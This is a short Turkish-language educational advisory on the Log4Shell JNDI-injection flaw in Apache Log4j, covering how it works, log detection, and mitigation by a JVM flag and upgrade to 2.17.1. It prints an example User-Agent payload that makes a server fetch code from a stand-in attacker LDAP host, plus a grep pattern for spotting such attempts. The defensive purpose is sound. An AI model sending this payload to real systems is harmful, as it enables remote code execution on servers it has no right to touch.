⚠️ Uyarı: Bu makale yalnızca eğitim amaçlıdır.

Genel Bakış

Güvenlik Açığı Türü: JNDI Injection ile RCE Etki: Kritik (CVSS 10.0) Etkilenen Sistemler: Apache Log4j 2.0-beta9 to 2.14.1


Güvenlik Açığı Nasıl Çalışır?

Log4j, kullanıcı girdisini yorumlayarak harici kaynakları getirebiliyordu:

User-Agent: ${jndi:ldap://saldirgan.com/exploit}

Tespit

# Log dosyalarında istismar girişimlerini ara
grep -E '\$\{jndi:(ldap|rmi|dns)://' /var/log/app/*.log

Azaltma

# Anlık çözüm
java -Dlog4j2.formatMsgNoLookups=true -jar application.jar
<!-- Kalıcı çözüm — Log4j güncelleme -->
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.17.1</version>
</dependency>

Temel Çıkarımlar

  1. Günlük bağlamlarında harici girdiye asla güvenme
  2. Varlık envanteri tut
  3. Sanal Yama (WAF kuralları) hızlı yanıt için kritiktir